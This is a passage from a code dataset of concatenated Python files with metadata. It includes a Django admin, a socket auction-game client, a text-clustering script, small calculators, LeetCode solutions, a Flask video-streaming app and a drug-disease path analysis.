FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(instance=obj, prefix=prefix,\n queryset=inline.queryset(request))\n formsets.append(formset)\n\n #hack again\n attrs = ProductAttribute.objects.filter(category=obj.category)\n init_details = build_initial_details(ProductDetail.objects.filter(product=obj))\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = AttrsForm(prefix='attrs', initial=init_details)\n #------------\n\n adminForm = helpers.AdminForm(form, self.get_fieldsets(request, obj),\n self.prepopulated_fields, self.get_readonly_fields(request, obj),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_admin_formsets = []\n for inline, formset in zip(self.inline_instances, formsets):\n fieldsets = list(inline.get_fieldsets(request, obj))\n readonly = list(inline.get_readonly_fields(request, obj))\n inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,\n fieldsets, readonly, model_admin=self)\n inline_admin_formsets.append(inline_admin_formset)\n media = media + inline_admin_formset.media\n\n context = {\n 'title': _('Change %s') % force_unicode(opts.verbose_name),\n 'adminform': adminForm,\n 'object_id': object_id,\n 'original': obj,\n 'is_popup': \"_popup\" in request.REQUEST,\n 'media': mark_safe(media),\n 'inline_admin_formsets': inline_admin_formsets,\n 'errors': helpers.AdminErrorList(form, formsets),\n 'root_path': self.admin_site.root_path,\n 'app_label': opts.app_label,\n 'attrs_form': attrs_form,\n }\n context.update(extra_context or {})\n return self.render_change_form(request, context, change=True, obj=obj)\n\nadmin.site.register(Product, ProductAdmin)\n\n#\nclass ProductAttributeTabular(admin.TabularInline):\n model = ProductAttribute\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n\nclass SmartFilterTabular(admin.TabularInline):\n model = SmartFilter\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n\nclass ProductFilterTabular(admin.TabularInline):\n model = ProductFilter\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"attribute\":\n if request._obj_:\n kwargs[\"queryset\"] = ProductAttribute.objects.filter(category=request._obj_)\n else:\n kwargs[\"queryset\"] = ProductAttribute.objects.none()\n return super(ProductFilterTabular, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\nclass CatalogCategoryAdmin(admin.ModelAdmin):\n prepopulated_fields = {\"slug\": (\"name\",)}\n inlines = [ProductAttributeTabular, SmartFilterTabular, ProductFilterTabular]\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n #class Media:\n #css = ( \"base/css/short_textarea.css\",)\n\n def get_form(self, request, obj=None, **kwargs):\n # just save obj reference for future processing in Inline\n request._obj_ = obj\n return super(CatalogCategoryAdmin, self).get_form(request, obj, **kwargs)\nadmin.site.register(CatalogCategory, CatalogCategoryAdmin)\n\n#\nadmin.site.register(ProductDetail)\n\n#\nadmin.site.register(ProductAttribute)\n\n#\nclass ManufacturerAdmin(admin.ModelAdmin):\n list_display = ['name', 'slug', 'url']\n prepopulated_fields = {\"slug\": (\"name\",)}\nadmin.site.register(Manufacturer, 
ManufacturerAdmin)","sub_path":"catalog/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":13655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"200241958","text":"#!/usr/bin/python3\n\nimport copy\nimport os\nimport sys\nimport glob\n\n## Import path hacking to make this run referencing the modules it needs.\nPACKAGE_PARENT = '../..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(),\n os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom lib.ai_tester import AITester\nfrom lib.dummy_ai import DummyAI\nfrom lib.johnny_ai import JohnnyAI\nfrom lib.pack_generator import PackGenerator\nfrom lib.timmy_ai import TimmyAI\n\n## Prints the usage string to stdout.\ndef print_usage():\n print('Improper arguments!\\n'\n 'Run as python3 timmy_tester.py '\n ' '\n ' '\n ' '\n '[set_file.json] '\n '[card_rankings.txt]\\n'\n '| serialized_draft_dir = the directory containing the serialized '\n 'draft data.\\n'\n '| output_draft_dir = the directory the results will be written to'\n '.\\n'\n '| tensor_flow_nn_filename = the file containing the Tensor Flow NN '\n 'used for the AI\\n'\n '| set_file.json = json filename containing the MTG cards\\n'\n '| card_rankings.txt = file containing rankings for each card\\n')\n\n## Writes a list named deck to the output file specified, with each value being\n## placed on a separate line. I know I should check return values but ehhhh.\ndef write_deck_to_file(deck, directory, file_name, name_type):\n # generate a unique filename\n # split the path to get the name from the end\n file_name = file_name.split('/')[-1]\n # get the name of the draft file\n file_name = '_'.join(file_name.split('_')[:2])\n # prepend with 'datum' or 'text'\n file_name = name_type + '_' + file_name + '.txt'\n with open(directory + file_name, 'w') as file_out:\n for card_index in deck:\n file_out.write(str(card_index) + '\\n')\n\n## Reads the contents of a file into a list and returns that list to the caller.\ndef read_file_into_list(filename):\n file_handle = open(filename, 'r')\n contents = []\n for line in file_handle:\n contents.append(line.strip().replace(' ', ''))\n file_handle.close()\n return copy.deepcopy(contents)\n\ndef main():\n if (len(sys.argv) != 4 and len(sys.argv) != 6):\n print_usage()\n sys.exit()\n\n serialized_draft_dir = sys.argv[1]\n output_dir = sys.argv[2]\n tensor_flow_nn_filename = sys.argv[3]\n\n # get the path names of all input files\n paths = glob.glob(serialized_draft_dir + '*.txt')\n\n set_file = ''\n card_rankings_file = ''\n set_file = '../../data/kaladesh/kaladesh.json'\n card_rankings_file = '../../data/kaladesh/kaladesh_pick_order.txt'\n if (len(sys.argv) == 6):\n set_file = sys.argv[4]\n card_rankings_file = sys.argv[5]\n\n ## Create PackGenerator for Kaladesh\n pack_gen = PackGenerator(set_file, card_rankings_file)\n\n ## Create an AI Core for Timmy.\n ai_core = TimmyAI(pack_gen, tensor_flow_nn_filename)\n\n ## Setup the test environment for the AI to run in.\n ai_tester = AITester(pack_gen)\n\n ai_picks = []\n datum_picks = []\n serialized_draft_data = []\n\n ## Read in the serialized_draft data.\n for file_name in paths:\n serialized_draft_data = read_file_into_list(file_name)\n\n ## Run the tests!\n datum_picks, ai_picks = ai_tester.run(ai_core, serialized_draft_data)\n\n ## Write the datum deck (the deck that was supposed to be drafted) to disk.\n write_deck_to_file(datum_picks, output_dir, 
file_name, 'datum')\n\n ## Write the deck the ai chose to draft to disk.\n write_deck_to_file(ai_picks, output_dir, file_name, 'test')\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/app/ai_tester/timmy_tester.py","file_name":"timmy_tester.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"251591945","text":"from __future__ import print_function #I added this because it made my life a lot easier when\n#the 'end = ...' function was added in the print function that I didn't know a nice way to do\n#in Python 2.7, so print statements must all have brackets in this version, no need in the server though\n# Echo client program\nimport socket\nimport random\nimport time\nimport os\nimport platform\n\n\nHOST = 'localhost' # The remote host\n\n# to act as a client\nPORT = 50018 # The server port\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n\n\n# APPLICATION\n\npartnerid = -1 # no partner\nnumberbidders = 0 # will be given by server\n\n# DO SOMETHING HERE\n# you need to change this to do something much more clever\ndef determinebid(itemsinauction, partnerid, numberbidders, winnerarray, winneramount):\n #if you have no money automatically bid 0\n if myTypes['money'] == 0:\n return 0\n #Otherwise input bid and check that it's a number\n output = raw_input(\"Input bid: \").strip()\n while(not (len(output) > 0 and output.isdigit())):\n output = raw_input(\"Input bid: \")\n return int(output)\n\n# DATA\n\nmybidderid = raw_input(\"Input team / player name : \").strip() # this is the only thing that distinguishes the clients \nwhile len(mybidderid) == 0 or ' ' in mybidderid:\n mybidderid = raw_input(\"You input an empty string or included a space in your name which is not allowed (_ or / are all allowed)\\n for example Emil_And_Nischal is okay\\nInput team / player name: \").strip()\n\nmoneyleft = 100 # should change over time\nwinnerarray = [] # who won each round\nwinneramount = [] # how much they paid\n\nitemsinauction = []\nmyTypes = {'Picasso': 0, 'Rembrandt': 0, 'Van_Gogh': 0, 'Da_Vinci': 0, 'money': moneyleft}\n\n# EXECUTION\n\n# get list of items and types\ngetlistflag = 1\ns.send(str(mybidderid))\nwhile(getlistflag == 1):\n # print \"Have sent data from \", str(mybidderid)\n data = s.recv(5024)\n x = data.split(\" \")\n # print \"Have received response at \", str(mybidderid), \" of: \", ' '.join(x)\n # Receives first how many players are in the game and then all 200 items in auction\n if(x[0] != \"Not\" and len(data) != 0):\n getlistflag = 0\n numbidders = int(x[0])\n itemsinauction = x[1:]\n for index in range(len(itemsinauction)-1, -1, -1):\n print (str(index+1) + '.', itemsinauction[index])\n print ('\\n')\n else:\n time.sleep(2)\n\nwhile True:\n s.send(str(mybidderid) + ' ')\n data = s.recv(5024)\n x = data.split(\" \")\n #Wait until everyone has connected before bidding\n if (x[0] == 'wait'):\n continue\n #When everyone has connected the server knows all names\n #it can therefore transfer all the names after telling the client that it's ready\n players = []\n for player in range(1, numbidders + 1):\n players.append(x[player])\n break\n#Create initial standings for each player after everyone connected\nstandings = {name: {'Picasso': 0, 'Van_Gogh': 0, 'Rembrandt': 0, 'Da_Vinci': 0, 'money': 100} for name in players}\n# now do bids\ncontinueflag = 1\nj = 0\n#Interface stuff, looks better if I clear the screen before writing all the info\n#but I want to 
give people time to study the list of itemsinauction properly before\n#they start the game. So I ask them when they're ready\nraw_input(\"Hit any key to start the game: \")\nif platform.system() == 'Windows':\n os.system('cls')\nelse:\n os.system('clear')\nwhile(continueflag == 1):\n i = len(winnerarray) \n print (\"Auction round\", str(j+1) + ':\\n')\n print (\"This is everyones standings:\\n\")\n for name in players:\n print (name + ':', standings[name])\n print()\n print()\n print (\"item type: \", itemsinauction[:i])\n print (\"Won by: \", winnerarray[:i])\n print (\"Bought for:\", winneramount[:i])\n print()\n print()\n print (\"next 20 items: \", end = '')\n for add in range(20):\n print (itemsinauction[i+add+1], end = ', ')\n print ('\\n')\n print()\n print (\"your current holdings are\", standings[mybidderid], '\\n')\n print (\"Current item to be bid for is: \" + itemsinauction[i])\n bidflag = 1\n bid = determinebid(itemsinauction, partnerid, numberbidders, winnerarray, winneramount)\n s.send(str(mybidderid) + \" \" + str(bid))\n while(bidflag == 1):\n # print \"Have sent data from \", str(mybidderid)\n data = s.recv(5024)\n x = data.split(\" \")\n # print \"Have received response at \", str(mybidderid), \" of: \", ' '.join(x)\n if(x[0] != \"Not\"):\n bidflag = 0\n else:\n time.sleep(2)\n\n\n resultflag = 1\n while(resultflag == 1):\n s.send(str(mybidderid))\n # print \"Have sent data from \", str(mybidderid)\n data = s.recv(5024)\n x = data.split(\" \")\n #Wait for all bids to be received\n if (x[0] == 'wait'):\n continue\n # print \"Have received response at \", str(mybidderid), \" of: \", ' '.join(x)\n if platform.system() == 'Windows':\n os.system('cls')\n else:\n os.system('clear')\n #Check if the server told client that game is finished\n if len(x) >= 7 and x[7] == 'won.':\n continueflag = 0\n resultflag = 0\n print(data)\n print()\n print('game over')\n #Else update standings, winnerarray etc.\n if(x[0] != \"ready\") and (continueflag == 1):\n resultflag = 0\n print (data)\n # print x\n winnerarray.append(x[0])\n winneramount.append(int(x[5]))\n standings[x[0]]['money'] -= int(x[5])\n standings[x[0]][x[3]] += 1\n if (x[1] == mybidderid):\n moneyleft -= int(x[5])\n myTypes[itemsinauction[j]] += 1\n # update moneyleft, winnerarray\n else:\n time.sleep(2)\n j+= 1\n for i in range(2):\n print()\n","sub_path":"AuctionGame/auctionhumanclientemil.py","file_name":"auctionhumanclientemil.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"626266597","text":"#-*-coding:utf8-*-\n#@Time: 2019/4/28:11 PM\n#@Author: baibai\n#@File: 80peach------.py\n#@SoftWare:PyCharm\n\n\"\"\"\n题目:海滩上有一堆桃子,五只猴子来分。\n第一只猴子把这堆桃子平均分为五份,多了一个,这只猴子把多的一个扔入海中,拿走了一份。\n第二只猴子把剩下的桃子又平均分成五份,又多了一个,它同样把多的一个扔入海中,拿走了一份,\n第三、第四、第五只猴子都是这样做的,问海滩上原来最少有多少个桃子?\n---------------------------------------------------------------------\n假设在第n个猴子分完之后岸上还剩余5x+1个桃子,等着下个猴子来分\n\"\"\"\n\nnum = int(raw_input(\"please input a number of monkey:\"))\n\ndef fn(n):\n if n == num:\n return\n return","sub_path":"基础练习/80peach------.py","file_name":"80peach------.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"592963566","text":"#!/usr/bin/env python \nimport json\nimport argparse\nimport pandas as pd\nimport numpy as np\nimport nltk.stem as stem\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.cluster import KMeans\n\n\ndef 
main(input_fname, output_fname, num_cluster, num_samples):\n raw_data = read_raw_data(input_fname)\n \n features = pre_process(raw_data)\n \n model = clustering(features, num_cluster)\n \n write_output(raw_data, model, num_samples, output_fname)\n \ndef read_raw_data(fname):\n with open(fname) as f:\n data = json.load(f)\n df = pd.DataFrame(data)\n df.dropna(axis=0, subset=['title','text'], inplace=True)\n df.reset_index(inplace=True, drop=True)\n return df\n\ndef pre_process(raw_data):\n vectorizer = StemmedTfidfVectorizer(min_df=20, max_df=0.9, stop_words='english')\n features = vectorizer.fit_transform(raw_data['text']).toarray()\n return pd.DataFrame(features, columns=vectorizer.get_feature_names())\n\ndef clustering(features, num_cluster):\n km = KMeans(n_clusters=num_cluster, init='random', n_init=1, verbose=1)\n km.fit(features)\n return km\n\ndef write_output(raw_data, model, num_samples, fname):\n raw_data['cluster'] = model.labels_\n result = raw_data.groupby('cluster', as_index=False).apply(lambda x: x.iloc[:num_samples])\n samples = result.to_dict('records')\n with open(fname, 'w') as f:\n json.dump(samples, f, indent=4)\n\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n def build_analyzer(self):\n stemmer = stem.SnowballStemmer('english')\n analyzer = super(StemmedTfidfVectorizer, self).build_analyzer()\n return lambda doc: (stemmer.stem(w) for w in analyzer(doc))\n \n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser('Cluster stories from the input file. Generate an output file with several samples for each cluster\\n')\n argparser.add_argument('-i', '--input', required=True, help='a json format input file. The file should have a list of dict, each of \\\n which has at least two attribute: title and text')\n argparser.add_argument('-o', '--output', help='output json file', required=True)\n argparser.add_argument('-c', '--clusters', type=int, default=50, help='Number of clusters to generate')\n argparser.add_argument('-s', '--samples', type=int, default=3, help='Number of samples picked in each cluster')\n args = argparser.parse_args()\n \n main(args.input, args.output, args.clusters, args.samples)\n \n","sub_path":"python/experiments/bin/experiment_clustering.py","file_name":"experiment_clustering.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"486407330","text":"print('{:=^40}'.format(' Lojas Guanabara '))\npreco = float(input('Qual o preço do produto?'))\ncondicao_pagamento = int(input('''\\033[30mQual é a condição de pagamento?\n\\033[mDigite 1: Caso queira pagar a vista em dinheiro/cheque.\nDigite 2: Caso queira pagar a vista no cartão.\nDigite 3: Caso queira pagar em até 2 vezes no cartão.\nDigite 4: Caso queira pagar em 3 vezes ou mais no cartão.'''))\n\nif condicao_pagamento == 1:\n total_pagar = preco * 0.90\n print('O total à pagar será {}'.format(total_pagar))\nelif condicao_pagamento == 2:\n total_pagar = preco * 0.95\n print('O total à pagar será {}'.format(total_pagar))\nelif condicao_pagamento == 3:\n total_pagar = preco * 1\n print('O total à pagar será {}'.format(total_pagar))\nelif condicao_pagamento == 4:\n qtd_parcela = float(input('Vai parcelar em quantas vezes?'))\n total_pagar = preco * 1.20\n valor_parcela = total_pagar/ qtd_parcela\n print('O total à pagar será {}'.format(total_pagar))\n print('O valor da parcela será 
{:.2f}'.format(valor_parcela))","sub_path":"basic-python/desafio044.py","file_name":"desafio044.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17598643","text":"from tkinter import *\n\nclass Calculator():\n def __init__(self, root, WIDTH, HEIGHT):\n self.WIDTH = WIDTH\n self.HEIGHT = HEIGHT\n\n self.enter_num1 = Entry(root, width=int(WIDTH * 0.8))\n self.enter_num2 = Entry(root, width=int(WIDTH * 0.8))\n self.addition_button = Button(root, command=eval('self.addition'), text='+')\n self.subtraction_button = Button(root, command=eval('self.subtraction'), text='-')\n self.multiplication_button = Button(root, command=eval('self.multiplication'),text='*')\n self.division_button = Button(root,command=eval('self.division') ,text='/')\n self.answer_field = Label(root)\n\n self.enter_num1.pack()\n self.enter_num2.pack()\n self.addition_button.pack()\n self.subtraction_button.pack()\n self.multiplication_button.pack()\n self.division_button.pack()\n self.answer_field.pack()\n\n def addition(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) + float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n \n def subtraction(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) - float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n\n def division(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) / float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n except ZeroDivisionError:\n self.answer_field['text'] = str('Деление на ноль невозможно')\n\n def multiplication(self):\n try:\n self.answer_field['text'] = str(float(self.enter_num1.get()) * float(self.enter_num2.get()))\n except ValueError:\n self.answer_field['text'] = str('Введите число')\n\ndef main():\n root = Tk()\n\n WIDTH = 250\n HEIGHT = 300\n\n root.title('Calculator')\n root.geometry(f'{WIDTH}x{HEIGHT}')\n\n calculator = Calculator(root, WIDTH, HEIGHT)\n root.mainloop()\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"326920922","text":"#Leetcode problem Number 831\n#Masking Personal Information\n\nimport re\n\nclass Solution:\n def maskPII(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n li = [0,1,2,3,4,5,6,7,8,9]\n for i in range(0,len(S)):\n if S[i]=='@':\n count = 1\n pos = i \n break\n else:\n count = 0\n if count==1:\n S = S.lower()\n return S[0]+5*\"*\"+S[pos-1]+S[pos:]\n else:\n num = \"\".join(list(filter(str.isdigit,S)))\n if len(num)==10:\n return \"***-***-\"+num[6:]\n else:\n x = len(num)-10\n st = \"+\"+x*\"*\"+\"-\"\n return st+\"***-***-\"+num[len(num)-4:]\n","sub_path":"maskingPersonalInformation.py","file_name":"maskingPersonalInformation.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"167347469","text":"\nimport os\nimport re\nimport acm\nimport time\nimport glob\nimport ctypes\nimport getpass\nimport FAptReportCommon\nimport FAptReportUtils\nimport xml.etree.cElementTree as ElementTree\nfrom subprocess import Popen, call, PIPE\n \n\nclass FAptUserPreferences(object):\n USER_PREFERENCES_XML = 'APTUserPreferences'\n 
APTPRO_EXE = 'APTPro.exe'\n APT_PATH = 'APT_INSTALLATION_PATH'\n APT_MODELS_PATH = 'APT_MODELS_PATH'\n\n def __init__(self):\n self.hndws = []\n self.app_data_apt_path = self.get_app_data_apt_path()\n\n def foreach_window(self, hwnd, lParam):\n GetWindowText = ctypes.windll.user32.GetWindowTextW\n GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW\n IsWindowVisible = ctypes.windll.user32.IsWindowVisible\n length = GetWindowTextLength(hwnd)\n buff = ctypes.create_unicode_buffer(length + 1)\n GetWindowText(hwnd, buff, length + 1)\n if IsWindowVisible(hwnd):\n if ('APTPro') in buff.value:\n self.hndws.append(hwnd)\n return False\n return True\n\n def hide_window(self):\n EnumWindows = ctypes.windll.user32.EnumWindows\n EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))\n EnumWindows(EnumWindowsProc(self.foreach_window), 0)\n\n def run(self, command, exe):\n p = Popen(command, shell=False, executable=exe, stdout=PIPE, stderr=PIPE)\n while not self.hndws:\n self.hide_window()\n SetWindowPos = ctypes.windll.user32.SetWindowPos\n TOGGLE_HIDEWINDOW = 0x80\n for hwnd in self.hndws:\n SetWindowPos(hwnd, 0, 0, 0, 0, 0, TOGGLE_HIDEWINDOW)\n time.sleep(1)\n p.kill()\n self.write_apt_user_preferences_file()\n return p.communicate()\n\n def write_file(self, user_preferences_path):\n with open(user_preferences_path, 'w') as f:\n context = acm.GetDefaultContext()\n preferences = str(context.GetExtension(\"FStringResource\", \"FObject\", self.USER_PREFERENCES_XML).Value())\n ads = ''.join((FAptReportUtils.FAptPath.get_customer_name(), '$'))\n user = getpass.getuser()\n preferences = re.sub('\\*\\*\\*\\*', user, preferences)\n preferences = re.sub('####', ads, preferences)\n f.write(preferences)\n f.close()\n \n def get_app_data_apt_path(self):\n app_data_path = FAptReportCommon.AptDatabasePath.get_csidl_appdata_path()\n return os.path.join(app_data_path, 'APT\\APTPro\\*')\n\n def write_apt_user_preferences_file(self):\n for path in glob.glob(self.app_data_apt_path):\n user_preferences_path = os.path.join(path, FAptReportCommon.AptDatabasePath.USER_PREFERENCES_FILE)\n self.write_file(user_preferences_path)\n \n @classmethod\n def get_apt_exe_path(cls):\n apt_path = FAptReportUtils.FAptReportParameters().get(cls.APT_PATH)\n os.chdir(apt_path)\n apt_exe_path = None\n for dirpath, dirnames, filenames in os.walk(os.getcwd()):\n if apt_exe_path:\n break\n for filename in (f for f in filenames if f == '%s' % cls.APTPRO_EXE):\n apt_exe_path = os.path.join(dirpath, filename)\n return apt_exe_path\n \n def user_preferences_exists(self):\n for path in glob.glob(self.app_data_apt_path):\n user_preferences_path = os.path.join(path, FAptReportCommon.AptDatabasePath.USER_PREFERENCES_FILE)\n if not os.path.exists(user_preferences_path):\n return 0\n return 1\n\n def create(self):\n if not self.user_preferences_exists():\n try:\n apt_exe_path = self.get_apt_exe_path()\n self.run(apt_exe_path, None)\n except Exception as err:\n raise err\n","sub_path":"Extensions/AMI APT/FPythonCode/FAptUserPreferences.py","file_name":"FAptUserPreferences.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"156942777","text":"from guillotina.component import queryMultiAdapter\nfrom guillotina.interfaces import IResourceFieldDeserializer\nfrom guillotina.interfaces import IResourceFieldSerializer\n\n\nasync def test_serialize_cloud_file(dummy_request):\n from 
guillotina.test_package import IFileContent, FileContent, CloudFile\n obj = FileContent()\n obj.file = CloudFile(filename='foobar.json', size=25, md5='foobar')\n # deserializer = queryMultiAdapter(\n # (IFile['file'], obj, dummy_request),\n # IResourceFieldDeserializer)\n # value = deserializer(data_value)\n serializer = queryMultiAdapter(\n (IFileContent['file'], obj, dummy_request),\n IResourceFieldSerializer)\n value = await serializer()\n assert value['filename'] == 'foobar.json'\n assert value['size'] == 25\n assert value['md5'] == 'foobar'\n\n\nasync def test_deserialize_cloud_file(dummy_request):\n from guillotina.test_package import IFileContent, FileContent, CloudFile\n obj = FileContent()\n deserializer = queryMultiAdapter(\n (IFileContent['file'], obj, dummy_request),\n IResourceFieldDeserializer)\n value = deserializer({\n 'filename': 'foobar.json',\n 'size': 25,\n 'md5': 'foobar'\n })\n\n assert isinstance(value, CloudFile)\n assert value.size == 25\n assert value.filename == 'foobar.json'\n assert value.md5 == 'foobar'\n","sub_path":"guillotina/tests/test_serialize.py","file_name":"test_serialize.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631183421","text":"class Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n t_map = [0] * 26\n for t in tasks:\n t_map[ord(t) - ord(\"A\")] += 1\n t_map.sort()\n # max_num 为最高次数,cnt 为最高次数的任务种类\n max_num, cnt = t_map[25], 0\n for i in range(26):\n if t_map[i] == max_num:\n cnt += 1\n return max((max_num - 1) * (n + 1) + cnt, len(tasks))\n","sub_path":"code/ch15/15.3.1.task-scheduler.py","file_name":"15.3.1.task-scheduler.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"179752227","text":"from flask import Flask, render_template, Response\nfrom flask_cors import CORS\nimport io\nimport numpy\nfrom PIL import Image\nimport time\n\nfrom ailive.config import cf\nfrom ailive.animate import Animator\nfrom ailive.modifiers import *\n\n\napp = Flask(__name__)\nCORS(app)\n\nanimator = Animator(cf.model, cf.audio)\n\nmodifiers = {\n 'white': White(100),\n 'grey': Greyscale(100),\n 'black': Black(100),\n 'filter': Filter(100),\n}\nmodifiers['black'].it = 100\nmodifiers['black'].reverse = True\n\n\ndef gen():\n for i in animator:\n i = i * 255\n shape = i.shape\n\n for k in modifiers:\n i = modifiers[k](i)\n\n multiplier = round(\n (1 - cf.flask.padding) * animator.screen_width / i.shape[1]\n )\n\n i = i.astype(numpy.uint8)\n i = Image.fromarray(i)\n i = i.resize((shape[1] * multiplier, shape[0] * multiplier))\n buf = io.BytesIO()\n i.save(buf, format='JPEG')\n frame = buf.getvalue()\n\n yield (b'--frame\\r \\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route('/modify/')\ndef modify(key):\n modifiers[key].reverse = False\n return 'ok'\n\n\n@app.route('/set-transition-len/')\ndef set_transition_len(steps):\n steps = int(steps)\n for k in modifiers:\n modifiers[k].n_steps = steps\n return 'ok'\n\n\n@app.route('/reset/')\ndef reset(key):\n modifiers[key].reverse = True\n return 'ok'\n\n\n@app.route('/pause/')\ndef pause(key):\n modifiers[key].done = True\n return 'ok'\n\n\n@app.route('/press/')\ndef 
press(key):\n animator.press(key)\n return 'ok'\n\n\n@app.route('/set-sensitivity/')\ndef set_sensitivity(level):\n animator.sensitivity = float(level)\n return 'ok'\n\n\n@app.route('/set-normalizer/')\ndef set_normalizer(level):\n animator.normalizer = float(level)\n return 'ok'\n\n\n@app.route('/set-walk-speed/')\ndef set_walk_speed(speed):\n speed = float(speed)\n if speed == 0:\n animator.random_walk = False\n else:\n window_size = int(10. / speed)\n print('window_size is ' + str(window_size))\n animator.random_walk = True\n animator.n_steps = (window_size / animator.walk_steps) * animator.n_steps\n animator.walk_steps = window_size\n return 'ok'\n\n\n@app.route('/controls')\ndef controls():\n return render_template('index.html', model_names=list(cf.flask.model_cfs.keys()))\n\n\n@app.route('/change-model/')\ndef change_model(name):\n animator.model_cf = cf.flask.model_cfs[name]\n return 'ok'\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, use_reloader=False)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"630268257","text":"import os\r\nfrom PIL import Image\r\nimport json\r\ntypes = ['.jpg','.png','jpeg','ico','.gif']\r\nroot = os.path.abspath(os.path.dirname(__file__))\r\njsonString = []\r\nfor file in os.listdir(os.path.join(root, 'covers')):\r\n\tif os.path.splitext(file)[-1] in types:\r\n\t\timgSize = Image.open(os.path.join(root, 'covers', file)).size\r\n\t\tjsonString.append(\"{0}.{1} {2}\".format(imgSize[0],imgSize[1],file))\r\njsonString = json.dumps(jsonString, indent=4).encode().decode(\"unicode_escape\")\r\nwith open(os.path.join(root, 'coverslist.json'), 'w', encoding=\"utf-8\") as f:\r\n\tf.write(jsonString)\r\n","sub_path":"images/static/covertool.py","file_name":"covertool.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"11925178","text":"import numpy as np\n\nthreshold = 0.15\n\n\ndef SimThreshold(A):\n # 进行阈值处理,小于阈值的相似度置为0\n rows, cols = A.shape\n for i in range(rows):\n for j in range(cols):\n if A[i, j] <= threshold:\n A[i, j] = 0\n print(\"相似度阈值处理完毕\")\n return A\n\n\n# Wrr = np.loadtxt(\"Datasets//drug_drug_sim.txt\")\n# Wdd = np.loadtxt(\"Datasets//disease_similarity.txt\")\n# Wrd = np.loadtxt(\"Datasets//drug_disease_noname.txt\")\nWrr = np.loadtxt(\"Datasets//DrugSimMat\")\nWdd = np.loadtxt(\"Datasets//DiseaseSimMat\")\nWrd = np.loadtxt(\"Datasets//DiDrAMat\").T\n\nWrr = SimThreshold(Wrr)\nWdd = SimThreshold(Wdd)\n\npath = []\ndrugNum = Wrr.shape[0]\ndiseaseNum = Wdd.shape[0]\nfile = open(\"Output\\\\data.txt\", \"a\")\n# 1.R-R-D\nprint(\"开始分析路径类型1\")\nfor Rs in range(drugNum): # 从Rs出发\n print(\"第1次路径分析第\" + str(Rs) + \"个药物\")\n for R1 in range(drugNum):\n if Rs != R1 and Wrr[Rs, R1] != 0: # 走到R1(跳过Rs)\n for Dt in 